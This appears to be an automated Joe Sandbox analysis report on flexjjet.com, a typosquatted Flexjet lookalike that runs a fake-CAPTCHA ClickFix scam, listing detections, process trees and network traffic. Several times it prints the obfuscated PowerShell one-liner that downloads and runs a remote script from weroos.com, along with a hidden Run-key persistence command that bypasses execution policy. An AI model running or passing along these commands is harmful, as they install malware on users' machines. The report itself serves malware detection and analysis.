Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://flexjjet.com

Overview

General Information

Sample URL:http://flexjjet.com
Analysis ID:1710272
Infos:

Detection

CAPTCHA Scam ClickFix
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Malicious sample detected (through community Yara rule)
Yara detected CAPTCHA Scam ClickFix
AI detected malicious Powershell script
AI detected suspicious URL
Bypasses PowerShell execution policy
Creates autostart registry keys with suspicious values (likely registry only malware)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
HTML page adds supicious text to clipboard
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,4887704872573849148,15116561827335116035,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 1008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://flexjjet.com" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cmd.exe (PID: 640 cmdline: "C:\Windows\system32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5504 cmdline: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • python.exe (PID: 2320 cmdline: "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py MD5: AF3E610BE9DCBF04D79C40C328316F81)
          • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • python.exe (PID: 3568 cmdline: "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32 MD5: AF3E610BE9DCBF04D79C40C328316F81)
  • cleanup

AI Summary

Source: https://flexjjet.com/?type=3

# Threat Overview: Typosquatting Phishing Attempt Impersonating Flexjet

## Key Findings

### Deceptive Domain Strategy
- The malicious website uses the domain `flexjjet.com`, which is a deliberate misspelling of the legitimate `flexjet.com` domain
- An extra "j" is strategically inserted to create visual similarity and potentially trick users into believing it's the authentic Flexjet website

### Sophisticated User Deception Techniques
- The site presents a "Region Selector" page that mimics a legitimate business website
- Includes a complex "verification" pop-up designed to appear as a security measure
- Verification steps require specific keyboard actions, likely to bypass automated detection and create an illusion of legitimacy

### Technical Indicators
- High phishing risk score of 8/10
- URL contains intentional typosquatting characteristics
- Uses HTTPS to create a false sense of security
- Closely mimics the visual design of the authentic Flexjet website

## Conclusion

This attack leverages subtle domain manipulation and sophisticated social engineering techniques to trick users into believing they are on the official Flexjet website. The primary goal appears to be capturing user interactions through a deceptive verification process, potentially setting up credential theft or malware delivery.

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_2096JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 5504INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x81816:$b1: ::WriteAllBytes(
    • 0x1b7d1e:$b1: ::WriteAllBytes(
    • 0x81609:$b2: ::FromBase64String(
    • 0x8172d:$b2: ::FromBase64String(
    • 0x1b7b11:$b2: ::FromBase64String(
    • 0x1b7c35:$b2: ::FromBase64String(
    • 0x815e8:$b3: ::UTF8.GetString(
    • 0x1b7af0:$b3: ::UTF8.GetString(
    • 0xdfa5:$s1: -join
    • 0xe715:$s1: -join
    • 0xcbf5a:$s1: -join
    • 0xcc6ba:$s1: -join
    • 0x146e1e:$s1: -join
    • 0x146e58:$s1: -join
    • 0x146f20:$s1: -join
    • 0x1470d9:$s1: -join
    • 0x1470fb:$s1: -join
    • 0x1473a3:$s1: -join
    • 0x1473c3:$s1: -join
    • 0x1473f5:$s1: -join
    • 0x14743d:$s1: -join

    HTML

    SourceRuleDescriptionAuthorStrings
    4.6.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      4.5.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5504, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1" , ProcessId: 1884, ProcessName: powershell.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyPower
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1884, TargetFilename: C:\Temp\PyEnv\python.exe
        Sigma detected: Suspicious Powershell In Registry Run Keys
        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyPower
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd", CommandLine: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 640, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd", ProcessId: 5504, ProcessName: powershell.exe
        Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5504, TargetFilename: C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-06-09T22:47:42.377730+020020221121Exploit Kit Activity Detected192.168.2.164973720.83.18.132443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        AI detected phishing page
        Source: https://flexjjet.com/?type=3Joe Sandbox AI: Score: 8 Reasons: The brand 'Flexjet' is a known private jet service provider., The URL 'flexjjet.com' contains a misspelling of the legitimate domain 'flexjet.com' with an extra 'j'., Misspellings in domain names are a common tactic used in phishing attempts., The URL does not match the legitimate domain name associated with the brand 'Flexjet'. DOM: 4.5.pages.csv
        Yara detected CAPTCHA Scam ClickFix
        Source: Yara matchFile source: 4.6.pages.csv, type: HTML
        Source: Yara matchFile source: 4.5.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_2096, type: DROPPED
        AI detected malicious Powershell script
        Source: Dropped: runme.ps1.19.drJoe Sandbox AI: Found malicious Powershell script: Script shows multiple high-risk behaviors: downloads and executes code from suspicious domain (weroos.com), creates persistence in Temp directory, uses mutex to ensure single instance, installs crypto libraries, and performs hidden setup of Python environment. Pattern matches typical malware dropper/loader behavior.
        AI detected suspicious URL
        Source: http://flexjjet.comJoe Sandbox AI: The URL 'http://flexjjet.com' closely resembles the legitimate URL 'http://flexjet.com', which is associated with the known brand Flexjet. The primary difference is the addition of an extra 'j' in the domain name, which is a common tactic in typosquatting to create visual similarity and potentially confuse users. There are no subdomains or unusual domain extensions that suggest a different legitimate purpose. The similarity score is high due to the minimal character difference, and the likelihood of typosquatting is also high given the context and the nature of the alteration.
        Source: https://flexjjet.comJoe Sandbox AI: The URL 'https://flexjjet.com' closely resembles the legitimate URL 'https://www.flexjet.com'. The primary difference is the addition of an extra 'j' in the domain name, which is a common tactic in typosquatting to create visual similarity and potentially confuse users. The legitimate brand, Flexjet, is a known private jet service provider. The similarity score is high due to the minimal character difference and the potential for user confusion. The likelihood of this being a typosquatting attempt is also high, given the structural similarity and the absence of any contextual indicators suggesting a different legitimate purpose for the domain.
        Source: https://duckduckgo.com/HTTP Parser: Total embedded image size: 45036
        Source: https://duckduckgo.com/?t=h_&q=flexjet&ia=webHTTP Parser: Total embedded image size: 18122
        Source: https://duckduckgo.com/HTTP Parser: Base64 decoded: <svg fill="none" viewBox="0 0 189 53" xmlns="http://www.w3.org/2000/svg"> <path fill="#333" d="M110.045 24.224h-2.405l-4.378 4.502v-9.003h-1.85v15.354h1.85v-5.056l4.995 4.994.061.062h2.22v-.185l-5.611-5.55zm-11.898 8.223c-.679.678-1.666 1.048-2.775 1.04...
        Source: https://flexjjet.com/HTTP Parser: No favicon
        Source: https://duckduckgo.com/?t=h_&q=flexjet&ia=webHTTP Parser: No favicon
        Source: https://flexjjet.com/?type=3HTTP Parser: No favicon
        Source: https://flexjjet.com/?type=3HTTP Parser: No favicon
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\LICENSE.txtJump to behavior
        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.189.173.4:443 -> 192.168.2.16:49758 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.16:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.63.92:443 -> 192.168.2.16:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.64.223:443 -> 192.168.2.16:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.0.175:443 -> 192.168.2.16:49767 version: TLS 1.2
        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_zoneinfo.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000018.00000000.1975619284.00007FF70C492000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_msi.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp
        Source: chrome.exeMemory has grown: Private usage: 5MB later: 53MB
        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=a279da2c5b244124869f757b83905435&ig=6cba30e9930b49e88e3d60ffd1f169de HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=a279da2c5b244124869f757b83905435&ig=a1891a94c2e8473fbfd7c148f4f4eab0 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=a279da2c5b244124869f757b83905435&ig=980d29b949644590b7a121cb5baedd13 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
